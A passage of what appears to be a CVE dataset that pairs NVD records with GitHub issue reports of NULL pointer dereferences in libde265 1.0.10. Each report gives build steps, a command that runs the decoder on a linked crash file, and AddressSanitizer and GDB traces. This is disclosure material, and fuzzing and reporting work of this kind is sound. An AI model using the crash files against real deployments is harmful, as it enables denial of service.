─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x0000000000000001 rbx 0x0000000000000000 rcx 0xffffffffffffffe0 rdx 0x00005555557f0fc0 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x0000000000000008 rsp 0x00007ffffffde7f0
r8 0x0000000000000008 r9 0x0000000000000001 r10 0x0000000000000001 r11 0x0000000000000000 r12 0x00007ffffffe66a0 r13 0x0000000000000000 r14 0x0000000000000008 r15 0x00000aaaaaafe2a1
rip 0x0000555555706664 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
704 }
705
706 extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
707 _mm_loadl_epi64 (__m128i_u const *__P)
708 {
709 return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
710 }
711
712 extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
713 _mm_loadu_si64 (void const *__P)
─── Stack ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���────────────────────────────────────────────────────────────────────
[0] from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
[1] from 0x0000555555706664 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+1236 at sse-motion.cc:987
[2] from 0x00005555557aa6ac in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const+182 at ../libde265/acceleration.h:296
[3] from 0x00005555557aa6ac in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+7260 at motion.cc:205
[4] from 0x00005555557a1068 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+26328 at ../libde265/image.h:301
[5] from 0x00005555557a1ede in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+446 at motion.cc:2141
[6] from 0x000055555568d602 in read_coding_unit(thread_context*, int, int, int, int)+8402 at slice.cc:4314
[7] from 0x00005555556962e2 in read_coding_quadtree(thread_context*, int, int, int, int)+2834 at slice.cc:4652
[8] from 0x00005555556968b7 in read_coding_quadtree(thread_context*, int, int, int, int)+4327 at slice.cc:4638
[9] from 0x0000555555697b83 in read_coding_tree_unit(thread_context*)+1587 at slice.cc:2861
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 7781 name dec265 from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __P = <optimized out>
loc x = 0, y = 0, x1 = <optimized out>, x2 = <optimized out>, src = 0x8 <error: Cannot access memory at address 0x8>: Cannot access memory at address 0x8…
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987 | https://api.github.com/repos/strukturag/libde265/issues/378/comments | 2 | 2023-01-28T02:54:24Z | 2023-03-04T07:39:03Z | https://github.com/strukturag/libde265/issues/378 | 1,560,655,877 | 378 | 4,777 |
CVE-2023-24754 | 2023-03-01T15:15:11.510 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/382"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/382"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/382 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv05.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3328352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570c29d bp 0x7ffffffe28c0 sp 0x7ffffffe24d0 T0)
==3328352==The signal is caused by a WRITE memory access.
==3328352==Hint: address points to the zero page.
#0 0x55555570c29c in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
#1 0x55555570c29c in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:237
#2 0x5555557b9c19 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:249
#3 0x5555557a1a6a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:544
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))
==3328352==ABORTING
```
# POC
[poc_segv05.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv05.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv05.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
727 *__P = __B;
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570c281 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+101 mov $0x10,%esi
0x000055555570c286 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+106 mov %rdx,%rdi
0x000055555570c289 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+109 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570c28e _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+114 movdqa -0x250(%rbp),%xmm0
0x000055555570c296 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+122 mov -0x380(%rbp),%rdx
0x000055555570c29d _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 movups %xmm0,(%rdx)
0x000055555570c2a0 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+132 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2870 rsp 0x00007ffffffe2480
r8 0x0000000000000000 r9 0x0000000000000040 r10 0x0000000000000040 r11 0x0000000000000040 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
rip 0x000055555570c29d eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
722 }
723
724 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
725 _mm_storeu_si128 (__m128i_u *__P, __m128i __B)
726 {
727 *__P = __B;
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
[1] from 0x000055555570c29d in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+1711 at sse-motion.cc:237
[2] from 0x00005555557b9c1a in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const+282 at ../libde265/acceleration.h:249
[3] from 0x00005555557a1a6b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+18639 at motion.cc:544
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[6] from 0x00005555556878c2 in read_coding_unit(thread_context*, int, int, int, int)+14437 at slice.cc:4497
[7] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3335404 name dec265 from 0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 18014673391583296, [1] = 18014673391583296}, r2 = {[0] = 0, [1] = 0}, r3 = {[0] = 0, [1] = 0}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237 | https://api.github.com/repos/strukturag/libde265/issues/382/comments | 2 | 2023-01-29T08:14:34Z | 2023-03-04T07:40:02Z | https://github.com/strukturag/libde265/issues/382 | 1,561,180,454 | 382 | 4,778 |
CVE-2023-24755 | 2023-03-01T15:15:11.577 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_weighted_pred_8_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/384"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/384"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/384 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv08.bin
WARNING: non-existing PPS referenced
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3596870==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5555555e5c61 bp 0x7ffffffe2930 sp 0x7ffffffe28e0 T0)
==3596870==The signal is caused by a WRITE memory access.
==3596870==Hint: address points to the zero page.
#0 0x5555555e5c60 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int) /home/fuzz/libde265/libde265/fallback-motion.cc:69
#1 0x5555557ba002 in acceleration_functions::put_weighted_pred(void*, long, short const*, long, int, int, int, int, int, int) const ../libde265/acceleration.h:272
#2 0x5555557a124f in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:512
#3 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#4 0x5555556848c0 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#5 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#6 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#7 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#8 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#9 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#10 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#11 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#12 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#13 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#14 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#15 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#16 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#17 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#18 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/fallback-motion.cc:69 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)
==3596870==ABORTING
```
# POC
[poc_segv08.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv08.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv08.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
Program received signal SIGSEGV, Segmentation fault.
0x00005555555e5c61 in put_weighted_pred_8_fallback (dst=0x0, dststride=0, src=0x7ffffffe6c90, srcstride=8, width=8, height=8, w=1, o=0, log2WD=6) at fallback-motion.cc:69
69 out[0] = Clip1_8bit(((in[0]*w + rnd)>>log2WD) + o);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555555e5c51 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1111 test %cl,%cl
0x00005555555e5c53 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1113 je 0x5555555e5c5d <put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1123>
0x00005555555e5c55 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1115 mov %rdx,%rdi
0x00005555555e5c58 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1118 callq 0x555555570e00 <__asan_report_store1@plt>
0x00005555555e5c5d put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1123 mov -0x8(%rbp),%rdx
0x00005555555e5c61 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 mov %dil,(%rdx)
0x00005555555e5c64 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1130 addq $0x1,-0x8(%rbp)
0x00005555555e5c69 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1135 addq $0x2,-0x10(%rbp)
0x00005555555e5c6e put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1140 addl $0x1,-0x18(%rbp)
0x00005555555e5c72 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1144 jmpq 0x5555555e5a29 <put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+559>
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeedb0 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe28e0 rsp 0x00007ffffffe2890
r8 0x0000000000000000 r9 0x0000000000000008 r10 0x00005555555e57fa r11 0x0000000000000000 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc55e r15 0x00007ffffffe2af0
rip 0x00005555555e5c61 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
64 for (int y=0;y<height;y++) {
65 const int16_t* in = &src[y*srcstride];
66 uint8_t* out = &dst[y*dststride];
67
68 for (int x=0;x<width;x++) {
69 out[0] = Clip1_8bit(((in[0]*w + rnd)>>log2WD) + o);
70 out++; in++;
71 }
72 }
73 }
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555555e5c61 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 at fallback-motion.cc:69
[1] from 0x00005555557ba003 in acceleration_functions::put_weighted_pred(void*, long, short const*, long, int, int, int, int, int, int) const+295 at ../libde265/acceleration.h:272
[2] from 0x00005555557a1250 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+16564 at motion.cc:512
[3] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[4] from 0x00005555556848c1 in read_coding_unit(thread_context*, int, int, int, int)+2148 at slice.cc:4314
[5] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[6] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[7] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[8] from 0x000055555568ea40 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[9] from 0x000055555558c206 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*)+3516 at decctx.cc:852
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3600511 name dec265 from 0x00005555555e5c61 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 at fallback-motion.cc:69
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg dst = 0x0: Cannot access memory at address 0x0, dststride = 0, src = 0x7ffffffe6c90: 0, srcstride = 8, width = 8, height = 8, w = 1, o = 0, log2WD = 6
loc x = 0, in = 0x7ffffffe6c90: 0, out = 0x0: Cannot access memory at address 0x0, y = 0, __PRETTY_FUNCTION__ = "void put_weighted_pred_8_fallback(uint8_t*, ptrdiff_t, const int16_t*, ptrdiff_t, int, int, int, in…, rnd = 32
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>> p out
$1 = (uint8_t *) 0x0
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69 | https://api.github.com/repos/strukturag/libde265/issues/384/comments | 2 | 2023-01-29T08:15:40Z | 2023-03-04T07:40:24Z | https://github.com/strukturag/libde265/issues/384 | 1,561,180,905 | 384 | 4,779 |
